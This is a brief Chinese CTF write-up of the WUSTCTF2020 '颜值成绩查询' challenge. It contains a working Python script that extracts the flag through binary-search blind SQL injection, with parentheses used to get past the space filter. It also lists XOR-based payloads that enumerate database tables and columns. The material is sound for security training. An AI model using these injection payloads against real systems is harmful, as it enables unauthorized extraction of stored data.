[WUSTCTF2020]颜值成绩查询
一道经典的用if条件判断的二分法盲注题目 过滤了空格 用()嵌套或者/**/绕过就行了 其他还好
复习一下二分法
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| import requests
import time
url = 'http://622046c8-08bf-4bd2-8873-9d43830c90c6.node4.buuoj.cn:81/'
result=''
for i in range(1,25):
low=31
high=127
mid = (low+high)//2
while low<=high:
paylaod = {"stunum":"if(ascii(substr((select(value)from(ctf.flag)),{},1))>{},1,0)".format(i,mid)}
r = requests.get(url=url,params=paylaod)
if ("admin" in r.text):
low = mid+1
mid = (low+high)//2
else:
high = mid-1
mid = (low+high)//2
result+=chr(high+1)
print(result)
time.sleep(0.3)
|
当然也可以用异或来注入
payload:
1
2
3
4
| 0^(ascii(substr(database(),1,1))>97)
0^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),1,1))>97)
0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),1,1))>97) 爆字段
0^(ascii(substr((select(value)from(ctf.flag)),1,1))>97)
|
